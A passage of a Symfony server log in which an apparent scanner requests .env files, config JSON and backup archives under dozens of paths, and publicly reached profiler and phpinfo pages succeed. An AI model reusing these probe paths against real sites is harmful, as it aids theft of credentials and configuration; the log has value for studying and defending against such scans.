  8294. [2025-12-20 20:54:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /nodeweb/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /nodeweb/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8295. [2025-12-20 20:54:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /old/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /old/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8296. [2025-12-20 20:54:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /portal/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /portal/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8297. [2025-12-20 20:54:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /private/env.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /private/env.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8298. [2025-12-20 20:54:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /product/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /product/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8299. [2025-12-20 20:54:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /production/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /production/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8300. [2025-12-20 20:55:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /project/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /project/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8301. [2025-12-20 20:55:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public-api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public-api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8302. [2025-12-20 20:55:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8303. [2025-12-20 20:55:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public_html/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public_html/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8304. [2025-12-20 20:55:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /qa/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /qa/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8305. [2025-12-20 20:55:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8306. [2025-12-20 20:55:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server/api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server/api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8307. [2025-12-20 20:55:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server/backend/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server/backend/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8308. [2025-12-20 20:55:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8309. [2025-12-20 20:56:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /services/environments.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /services/environments.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8310. [2025-12-20 20:56:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /shared/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /shared/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8311. [2025-12-20 20:56:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /shop/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /shop/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8312. [2025-12-20 20:56:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8313. [2025-12-20 20:56:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/config/environment.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/config/environment.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8314. [2025-12-20 20:56:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /staging/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /staging/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8315. [2025-12-20 20:56:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /stg/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /stg/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8316. [2025-12-20 20:56:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /test/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /test/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8317. [2025-12-20 20:57:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /user/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /user/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8318. [2025-12-20 20:57:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v1/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v1/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8319. [2025-12-20 20:57:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /web/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /web/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8320. [2025-12-20 20:57:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /website/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /website/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8321. [2025-12-20 20:58:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a26a5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a26a5e","method":"GET"} []
  8322. [2025-12-20 20:58:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  8323. [2025-12-20 21:01:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc1c8b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/cc1c8b","method":"GET"} []
  8324. [2025-12-20 21:01:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  8325. [2025-12-20 21:05:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"53b09b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/53b09b?panel=request","method":"GET"} []
  8326. [2025-12-20 21:05:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  8327. [2025-12-20 21:08:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c78c5b","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c78c5b?panel=twig","method":"GET"} []
  8328. [2025-12-20 21:08:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  8329. [2025-12-20 21:11:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  8330. [2025-12-20 21:11:50] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
  8331. [2025-12-20 21:13:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  8332. [2025-12-20 21:14:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=config","method":"GET"} []
  8333. [2025-12-20 21:14:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  8334. [2025-12-20 21:17:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f44717","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/f44717?panel=swiftmailer","method":"GET"} []
  8335. [2025-12-20 21:17:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  8336. [2025-12-20 21:18:52] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  8337. [2025-12-20 21:25:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8338. [2025-12-20 21:25:35] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  8339. [2025-12-20 21:29:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8340. [2025-12-20 21:30:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=time","method":"GET"} []
  8341. [2025-12-20 21:30:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  8342. [2025-12-20 21:30:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=swiftmailer","method":"GET"} []
  8343. [2025-12-20 21:30:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  8344. [2025-12-20 21:30:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=security","method":"GET"} []
  8345. [2025-12-20 21:30:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  8346. [2025-12-20 21:30:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=db","method":"GET"} []
  8347. [2025-12-20 21:30:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  8348. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mongodb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mongodb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8349. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8350. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbadmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbadmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8351. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /old.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /old.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8352. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sources.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sources.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
